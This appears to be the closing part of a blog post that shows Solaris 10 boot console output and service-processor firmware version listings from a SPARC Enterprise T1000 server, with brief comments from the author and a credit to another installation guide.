ramdisk-root hsfs-file-system
Loading: /platform/SUNW,SPARC-Enterprise-T1000/kernel/sparcv9/unix
SunOS Release 5.10 Version Generic_150400-38 64-bit
Copyright (c) 1983, 2016, Oracle and/or its affiliates. All rights reserved.
os-io WARNING: failed to resolve 'scsa,probe' driver alias, defaulting to 'nulldriver'
WARNING: failed to resolve 'scsa,nodev' driver alias, defaulting to 'nulldriver'
Hostname: hostnix01
Configuring devices.
LDAP NIS domain name is
No panics. Yay!
#.
sc> showhost
SPARC-Enterprise-T1000 System Firmware 6.7.13 2013/09/24 08:10
Host flash versions:
OBP 4.30.4.e 2013/09/23 16:06
Hypervisor 1.7.3.d 2013/09/24 07:19
POST 4.30.4.b 2010/07/09 14:25
All is as it should be.
....
some of this was lifted from here:
https://www.arm-blog.com/installing-solaris-10-on-a-sunfire-v210-via-network/
Subscribe to:
Posts (Atom)